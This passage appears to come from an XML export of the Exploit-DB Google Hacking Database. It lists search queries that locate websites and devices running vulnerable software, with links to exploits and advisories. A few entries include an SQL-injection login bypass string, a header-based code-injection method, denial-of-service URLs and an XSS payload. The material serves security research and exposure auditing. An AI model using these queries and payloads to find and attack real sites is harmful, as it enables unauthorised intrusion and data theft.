<querystring>https://www.google.com/search?q=intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; | &quot;netsparker&quot; | &quot;nmap&quot;) filetype:pdf</querystring>
<edb></edb>
<date>2019-05-29</date>
<author>Deepak Joshi</author>
</entry>
<entry>
<id>2359</id>
<link>https://www.exploit-db.com/ghdb/2359</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Rx08.ii36B.Rv&quot;</shortDescription>
<textualDescription>RapidLeech Scripts Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/14430</textualDescription>
<query>intitle:&quot;Rx08.ii36B.Rv&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Rx08.ii36B.Rv%22</querystring>
<edb>https://www.exploit-db.com/exploits/14430</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2148</id>
<link>https://www.exploit-db.com/ghdb/2148</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Shorty (Beta)&quot;</shortDescription>
<textualDescription>Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/9419</textualDescription>
<query>intitle:&quot;Shorty (Beta)&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Shorty+(Beta)%22</querystring>
<edb>https://www.exploit-db.com/exploits/9419</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6641</id>
<link>https://www.exploit-db.com/ghdb/6641</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Sphider Admin Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Sphider Admin Login&quot;
# Sphider Search Engine 1.3.6 - Multiple Vulnerabilities.
https://www.exploit-db.com/exploits/48957
https://www.exploit-db.com/exploits/34189
# Date: 27/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Sphider Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Sphider Admin Login&quot;</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>731</id>
<link>https://www.exploit-db.com/ghdb/731</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;View Img&quot; inurl:viewimg.php</shortDescription>
<textualDescription>It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information.</textualDescription>
<query>intitle:&quot;View Img&quot; inurl:viewimg.php</query>
<querystring>https://www.google.com/search?q=intitle:%22View+Img%22+inurl:viewimg.php</querystring>
<edb></edb>
<date>2004-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1677</id>
<link>https://www.exploit-db.com/ghdb/1677</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;vrnews v1&quot;</shortDescription>
<textualDescription>VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability - CVE: 2007-3611: https://www.exploit-db.com/exploits/4150</textualDescription>
<query>intitle:&quot;vrnews v1&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22vrnews+v1%22</querystring>
<edb>https://www.exploit-db.com/exploits/4150</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3737</id>
<link>https://www.exploit-db.com/ghdb/3737</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;vtiger CRM 5 - Commercial Open Source CRM&quot;</shortDescription>
<textualDescription>vtiger CRM version 5.x presence
--
LiquidWorm</textualDescription>
<query>intitle:&quot;vtiger CRM 5 - Commercial Open Source CRM&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;vtiger CRM 5 - Commercial Open Source CRM&quot;</querystring>
<edb></edb>
<date>2011-08-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4649</id>
<link>https://www.exploit-db.com/ghdb/4649</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;WAGO Ethernet web-based-management&quot;</shortDescription>
<textualDescription>Vulnerable Wago devices can be identified with the following dork
intitle:&quot;WAGO Ethernet web-based-management&quot;
Reference: https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-341-01
Thanks,
Mudassar
</textualDescription>
<query>intitle:&quot;WAGO Ethernet web-based-management&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;WAGO Ethernet web-based-management&quot;</querystring>
<edb></edb>
<date>2018-01-03</date>
<author>Mudassar</author>
</entry>
<entry>
<id>561</id>
<link>https://www.exploit-db.com/ghdb/561</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;WebJeff - FileManager&quot; intext:&quot;login&quot; intext:Pass|PAsse</shortDescription>
<textualDescription>WebJeff-Filemanager 1.x DESCRIPTION: A directory traversal vulnerability has been identified in WebJeff-Filemanager allowing malicious people to view the contents of arbitrary files. The problem is that the &quot;index.php3&quot; file doesn't verify the path to the requested file. Access to files can be done without authorisation. http://www.securityfocus.com/bid/7995</textualDescription>
<query>intitle:&quot;WebJeff - FileManager&quot; intext:&quot;login&quot; intext:Pass|PAsse</query>
<querystring>https://www.google.com/search?q=intitle%3A%22WebJeff+-+FileManager%22+intext%3A%22login%22+intext%3APass%7CPAsse</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>526</id>
<link>https://www.exploit-db.com/ghdb/526</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;WordPress &gt; * &gt; Login form&quot; inurl:&quot;wp-login.php&quot;</shortDescription>
<textualDescription>WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/</textualDescription>
<query>intitle:&quot;WordPress &gt; * &gt; Login form&quot; inurl:&quot;wp-login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22WordPress+%3E+*+%3E+Login+form%22+inurl%3A%22wp-login.php%22+</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1375</id>
<link>https://www.exploit-db.com/ghdb/1375</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;X7 Chat Help Center&quot; | &quot;Powered By X7 Chat&quot; -milw0rm -exploit</shortDescription>
<textualDescription>this is for X7 Chat</textualDescription>
<query>intitle:&quot;X7 Chat Help Center&quot; | &quot;Powered By X7 Chat&quot; -milw0rm -exploit</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22X7+Chat+Help+Center%22+%7C+%22Powered+By+X7+Chat%22+-milw0rm+-exploit&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3585</id>
<link>https://www.exploit-db.com/ghdb/3585</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;X7 Chat Help Center&quot;|&quot;Powered By X7 Chat&quot;</shortDescription>
<textualDescription>X7 Chat 2.0 (help_file) Remote Commands Execution - CVE: 2006-2156:
https://www.exploit-db.com/exploits/1738</textualDescription>
<query>intitle:&quot;X7 Chat Help Center&quot;|&quot;Powered By X7 Chat&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22X7+Chat+Help+Center%22|%22Powered+By+X7+Chat%22</querystring>
<edb>https://www.exploit-db.com/exploits/1738</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1382</id>
<link>https://www.exploit-db.com/ghdb/1382</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;XOOPS Site&quot; intitle:&quot;Just Use it!&quot; | &quot;powered by xoops (2.0)|(2.0.....)&quot;</shortDescription>
<textualDescription>this is the dork for the XOOPS 2.x 'xoopsOption[nocommon]' overwrite vulnerability, advisory &amp; poc exploit:http://retrogod.altervista.org/xoops_20132_incl.html</textualDescription>
<query>intitle:&quot;XOOPS Site&quot; intitle:&quot;Just Use it!&quot; | &quot;powered by xoops (2.0)|(2.0.....)&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22XOOPS+Site%22+intitle:%22Just+Use+it!%22+%7C+%22powered+by+xoops+(2.0)%7C(2.0.....)%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1634</id>
<link>https://www.exploit-db.com/ghdb/1634</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;zFeeder admin panel&quot;</shortDescription>
<textualDescription>zFeeder 1.6 (admin.php) No Authentication Vulnerability - CVE: 2009-0807: https://www.exploit-db.com/exploits/8092</textualDescription>
<query>intitle:&quot;zFeeder admin panel&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22zFeeder+admin+panel%22</querystring>
<edb>https://www.exploit-db.com/exploits/8092</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3306</id>
<link>https://www.exploit-db.com/ghdb/3306</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:admbook intitle:version filetype:php</shortDescription>
<textualDescription>Admbook 1.2.2 (X-Forwarded-For) Remote Command Execution - CVE: 2006-0852: https://www.exploit-db.com/exploits/1512</textualDescription>
<query>intitle:admbook intitle:version filetype:php</query>
<querystring>https://www.google.com/search?q=intitle:admbook+intitle:version+filetype:php</querystring>
<edb>https://www.exploit-db.com/exploits/1512</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1312</id>
<link>https://www.exploit-db.com/ghdb/1312</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:admbook intitle:version filetype:php</shortDescription>
<textualDescription>intitle:admbook intitle:version filetype:php tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message also you can see phpinfo(): http://[target]/[path]/admin/info.phpperl exploit:http://retrogod.altervista.org/admbook_122_xpl.html</textualDescription>
<query>intitle:admbook intitle:version filetype:php</query>
<querystring>https://www.google.com/search?q=intitle%3Aadmbook+intitle%3Aversion+filetype%3Aphp+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1757</id>
<link>https://www.exploit-db.com/ghdb/1757</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie</shortDescription>
<textualDescription>MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability - CVE: 2007-6649: https://www.exploit-db.com/exploits/4815</textualDescription>
<query>intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie</query>
<querystring>https://www.google.com/search?q=intitle:Bilder+Galerie+1.1+or+intitle:Bilder+Galerie</querystring>
<edb>https://www.exploit-db.com/exploits/4815</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6435</id>
<link>https://www.exploit-db.com/ghdb/6435</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*</shortDescription>
<textualDescription>Hello!
I have found a google dork to find ePMP 1000 devices. ePMP 1000 is
vulnerable to command execution and changing of administrator credentials
You can find a lot of vulnerable hosts with this google dork.
Have a nice day!
</textualDescription>
<query>intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*</query>
<querystring>https://www.google.com/search?q=intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>cyb3rmx0</author>
</entry>
<entry>
<id>225</id>
<link>https://www.exploit-db.com/ghdb/225</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:guestbook &quot;advanced guestbook 2.2 powered&quot;</shortDescription>
<textualDescription>Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit &quot;Admin&quot; then do the following:Leave username field blank.For password, enter this exactly:') OR ('a' = 'aYou are now in the Guestbook's Admin section.http://www.securityfocus.com/bid/10209</textualDescription>
<query>intitle:guestbook &quot;advanced guestbook 2.2 powered&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Aguestbook+%22advanced+guestbook+2.2+powered%22</querystring>
<edb></edb>
<date>2004-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1106</id>
<link>https://www.exploit-db.com/ghdb/1106</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:guestbook inurl:guestbook &quot;powered by Advanced guestbook 2.*&quot; &quot;Sign the Guestbook&quot;</shortDescription>
<textualDescription>Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_notices/index.php?id=2209&amp;delimit=1#detail</textualDescription>
<query>intitle:guestbook inurl:guestbook &quot;powered by Advanced guestbook 2.*&quot; &quot;Sign the Guestbook&quot;</query>
<querystring>https://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1084</id>
<link>https://www.exploit-db.com/ghdb/1084</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:guestbook inurl:guestbook &quot;powered by Advanced guestbook 2.*&quot; &quot;Sign the Guestbook&quot;</shortDescription>
<textualDescription>Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.</textualDescription>
<query>intitle:guestbook inurl:guestbook &quot;powered by Adva</query>
<querystring>https://www.google.com/search?q=intitle:guestbook+inurl:guestbook+%22powered+by++Advanced+guestbook+2.*%22+%22Sign+the+Guestbook%22&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4471</id>
<link>https://www.exploit-db.com/ghdb/4471</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:index of AND (intext:mirai.x86 OR intext:mirai.mips OR intext:mirai.mpsl OR intext:mirai.arm OR intext:mirai.arm7 OR intext:mirai.ppc OR intext:mirai.spc OR intext:mirai.m68k OR intext:mirai.sh4)</shortDescription>
<textualDescription>Description: Find servers infected with mirai
Author: SadFud</textualDescription>
<query>intitle:index of AND (intext:mirai.x86 OR intext:mirai.mips OR intext:mirai.mpsl OR intext:mirai.arm OR intext:mirai.arm7 OR intext:mirai.ppc OR intext:mirai.spc OR intext:mirai.m68k OR intext:mirai.sh4)</query>
<querystring>https://www.google.com/search?q=intitle:index of AND (intext:mirai.x86 OR intext:mirai.mips OR intext:mirai.mpsl OR intext:mirai.arm OR intext:mirai.arm7 OR intext:mirai.ppc OR intext:mirai.spc OR intext:mirai.m68k OR intext:mirai.sh4)</querystring>
<edb></edb>
<date>2017-05-08</date>
<author>SadFud</author>
</entry>
<entry>
<id>1159</id>
<link>https://www.exploit-db.com/ghdb/1159</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:Mantis &quot;Welcome to the bugtracker&quot; &quot;0.15 | 0.16 | 0.17 | 0.18&quot;</shortDescription>
<textualDescription>cross site scripting and sql injection vunerabilities were discovered in Mantis versions 0.19.2 or less. Mantis is a web-based bugtracking system written in PHP. Vunerability report athttp://search.securityfocus.com/archive/1/411591/30/0/threaded</textualDescription>
<query>intitle:Mantis &quot;Welcome to the bugtracker&quot; &quot;0.15 | 0.16 | 0.17 | 0.18&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3AMantis+%22Welcome+to+the+bugtracker%22+%220.15+%7C+0.16+%7C+0.17+%7C+0.18%22</querystring>
<edb></edb>
<date>2005-10-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1741</id>
<link>https://www.exploit-db.com/ghdb/1741</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:Mp3 ToolBox 1.0</shortDescription>
<textualDescription>Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability - CVE: 2007-6139: https://www.exploit-db.com/exploits/4650</textualDescription>
<query>intitle:Mp3 ToolBox 1.0</query>
<querystring>https://www.google.com/search?q=intitle:Mp3+ToolBox+1.0</querystring>
<edb>https://www.exploit-db.com/exploits/4650</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3382</id>
<link>https://www.exploit-db.com/ghdb/3382</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:phpinfo intext:&quot;php version&quot; +windows</shortDescription>
<textualDescription>PHP 5.x COM functions safe_mode and disable_function bypass - CVE: 2007-5653: https://www.exploit-db.com/exploits/4553</textualDescription>
<query>intitle:phpinfo intext:&quot;php version&quot; +windows</query>
<querystring>https://www.google.com/search?q=intitle:phpinfo+intext:%22php+version%22+%2Bwindows</querystring>
<edb>https://www.exploit-db.com/exploits/4553</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2809</id>
<link>https://www.exploit-db.com/ghdb/2809</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:phpMyAdmin</shortDescription>
<textualDescription>phpMyAdmin Code Injection RCE - CVE: 2009-1151: https://www.exploit-db.com/exploits/8992</textualDescription>
<query>intitle:phpMyAdmin</query>
<querystring>https://www.google.com/search?q=intitle:phpMyAdmin</querystring>
<edb>https://www.exploit-db.com/exploits/8992</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3629</id>
<link>https://www.exploit-db.com/ghdb/3629</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:PhpMyAdmin inurl:error.php</shortDescription>
<textualDescription>intitle:PhpMyAdmin inurl:error.php</textualDescription>
<query>PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification</query>
<querystring>https://www.google.com/search?q=intitle:PhpMyAdmin inurl:error.php</querystring>
<edb>https://www.exploit-db.com/exploits/15699</edb>
<date>2010-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1327</id>
<link>https://www.exploit-db.com/ghdb/1327</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:PHPOpenChat inurl:&quot;index.php?language=&quot;</shortDescription>
<textualDescription>exploit:http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.htmlalso, information disclosure:http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfoand denial of service on some windows system, multiple requests of:http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog</textualDescription>
<query>intitle:PHPOpenChat inurl:&quot;index.php?language=&quot;</query>
<querystring>https://www.google.com/search?q=intitle:PHPOpenChat+inurl:%22index.php%3Flanguage%3D%22+&amp;num=100&amp;hl=it&amp;start=0&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5991</id>
<link>https://www.exploit-db.com/ghdb/5991</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net</shortDescription>
<textualDescription># Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Sites vulnerable to qdPM &lt; 9.1 - Remote Code Execution. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/48146
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net</query>
<querystring>https://www.google.com/search?q=intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6314</id>
<link>https://www.exploit-db.com/ghdb/6314</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net</shortDescription>
<textualDescription># Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# qdPM 9.1 - Remote Code Execution. This dork is linked to the following
# existing exploit (CVE : CVE-2020-7246):
# https://www.exploit-db.com/exploits/47954
# Date: 18/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net</query>
<querystring>https://www.google.com/search?q=intitle:qdPM 9.1. Copyright (c) 2020 qdpm.net</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2340</id>
<link>https://www.exploit-db.com/ghdb/2340</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:USP FOSS Distribution</shortDescription>
<textualDescription>USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability - CVE: 2007-2271: https://www.exploit-db.com/exploits/3794</textualDescription>
<query>intitle:USP FOSS Distribution</query>
<querystring>https://www.google.com/search?q=intitle:USP+FOSS+Distribution</querystring>
<edb>https://www.exploit-db.com/exploits/3794</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1518</id>
<link>https://www.exploit-db.com/ghdb/1518</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:Web Calendar system v 3.30 inurl:.asp</shortDescription>
<textualDescription>Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities - CVE: 2004-1552: https://www.exploit-db.com/exploits/7242</textualDescription>
<query>intitle:Web Calendar system v 3.30 inurl:.asp</query>
<querystring>https://www.google.com/search?q=intitle:Web+Calendar+system+v+3.30+inurl:.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7242</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1569</id>
<link>https://www.exploit-db.com/ghdb/1569</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:Web Calendar system v 3.40 inurl:.asp</shortDescription>
<textualDescription>Web Calendar System 3.40 (XSS/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7265</textualDescription>
<query>intitle:Web Calendar system v 3.40 inurl:.asp</query>
<querystring>https://www.google.com/search?q=intitle:Web+Calendar+system+v+3.40++inurl:.asp</querystring>
<edb>https://www.exploit-db.com/exploits/7265</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2331</id>
<link>https://www.exploit-db.com/ghdb/2331</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:WEBEYES GUEST BOOK inurl:.asp?id=</shortDescription>
<textualDescription>WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability - CVE: 2009-1950: https://www.exploit-db.com/exploits/8859</textualDescription>
<query>intitle:WEBEYES GUEST BOOK inurl:.asp?id=</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=intitle:WEBEYES+GUEST+BOOK+++++inurl:.asp%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/8859</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>630</id>
<link>https://www.exploit-db.com/ghdb/630</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:welcome.to.horde</shortDescription>
<textualDescription>Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus.</textualDescription>
<query>intitle:welcome.to.horde</query>
<querystring>https://www.google.com/search?q=intitle:welcome.to.horde&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>2303</id>
<link>https://www.exploit-db.com/ghdb/2303</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl :/PhotoCart/</shortDescription>
<textualDescription>Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability - CVE: 2006-6093: https://www.exploit-db.com/exploits/2817</textualDescription>
<query>inurl :/PhotoCart/</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl+:/PhotoCart/</querystring>
<edb>https://www.exploit-db.com/exploits/2817</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1593</id>
<link>https://www.exploit-db.com/ghdb/1593</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl&quot;com_gurujibook&quot;</shortDescription>
<textualDescription>Joomla Component com_gurujibook SQL injection Vulnerability: https://www.exploit-db.com/exploits/11225</textualDescription>
<query>inurl&quot;com_gurujibook&quot;</query>
<querystring>https://www.google.com/search?q=inurl%22com_gurujibook%22</querystring>
<edb>https://www.exploit-db.com/exploits/11225</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1623</id>
<link>https://www.exploit-db.com/ghdb/1623</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl: &quot;com_alphacontent&quot;</shortDescription>
<textualDescription>Joomla Component alphacontent 2.5.8 (id) SQL Injection Vulnerability - CVE: 2008-1559: https://www.exploit-db.com/exploits/5310</textualDescription>
<query>inurl: &quot;com_alphacontent&quot;</query>
<querystring>https://www.google.com/search?q=inurl:+%22com_alphacontent%22</querystring>
<edb>https://www.exploit-db.com/exploits/5310</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2258</id>
<link>https://www.exploit-db.com/ghdb/2258</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl: &quot;tops_top.php? id_cat =&quot;</shortDescription>
<textualDescription>Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability - CVE: 2008-3204: https://www.exploit-db.com/exploits/6044</textualDescription>
<query>inurl: &quot;tops_top.php? id_cat =&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:+%22tops_top.php%3F+id_cat+%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6044</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6506</id>
<link>https://www.exploit-db.com/ghdb/6506</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl: login.rsp</shortDescription>
<textualDescription># Google Dork: inurl: login.rsp
# Date: 27/08/2020
# Exploit Author: Shreyas Gujar
# CVE : CVE-2018-9995
# Description: The CVE-2018-9995 vulnerability against IoT devices. It is
able to extract account credentials of DVR devices thereby accessing the
devices and their video feeds.
Thanks and best regards
Shreyas Gujar
https://twitter.com/shreyasrx?s=09
</textualDescription>
<query>inurl: login.rsp</query>
<querystring>https://www.google.com/search?q=inurl: login.rsp</querystring>
<edb></edb>
<date>2020-08-31</date>
<author>Shreyas Gujar</author>
</entry>
<entry>
<id>1494</id>
<link>https://www.exploit-db.com/ghdb/1494</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl: modifyform.html?code=</shortDescription>
<textualDescription>modifyform (modifyform.html) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4423</textualDescription>
<query>inurl: modifyform.html?code=</query>
<querystring>https://www.google.com/search?q=inurl:+modifyform.html%3Fcode%3D</querystring>
<edb>https://www.exploit-db.com/exploits/4423</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1803</id>
<link>https://www.exploit-db.com/ghdb/1803</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl: Powered by Traidnt UP Version 1.0.</shortDescription>
<textualDescription>Traidnt UP Version 1.0 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/8006</textualDescription>
<query>inurl: Powered by Traidnt UP Version 1.0.</query>
<querystring>https://www.google.com/search?q=inurl:+Powered+by+Traidnt+UP+Version+1.0.</querystring>
<edb>https://www.exploit-db.com/exploits/8006</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2288</id>
<link>https://www.exploit-db.com/ghdb/2288</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl: user_info.php?user_id= &quot; Or &quot; inurl: index.php?catid= &quot;</shortDescription>
<textualDescription>Free Advertisment cms (user_info.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12572</textualDescription>
<query>inurl: user_info.php?user_id= &quot; Or &quot; inurl: index.php?catid= &quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:+user_info.php%3Fuser_id%3D+%22++Or++%22+inurl:+index.php%3Fcatid%3D+%22</querystring>
<edb>https://www.exploit-db.com/exploits/12572</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4245</id>
<link>https://www.exploit-db.com/ghdb/4245</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;.asp?strParents=&quot;</shortDescription>
<textualDescription>Author: Charley Celice (@charleycelice)
99% of sites I found using this dork are vulnerable to XSS attacks. The
&quot;strParents&quot; parameter seems to always be injectable.
Example:
https://example/whatever.asp?strParents=
&quot;/&gt;&amp;CAT_ID=1337&amp;whatever=1337&amp;etc...
-stmerry</textualDescription>
<query>inurl:&quot;.asp?strParents=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.asp?strParents=&quot;</querystring>
<edb></edb>
<date>2016-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4414</id>
<link>https://www.exploit-db.com/ghdb/4414</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;.php?cat=&quot; inurl:&quot;'&quot;</shortDescription>
<textualDescription>Finds sites vulnerable to SQL Injection!
Dxtroyer</textualDescription>
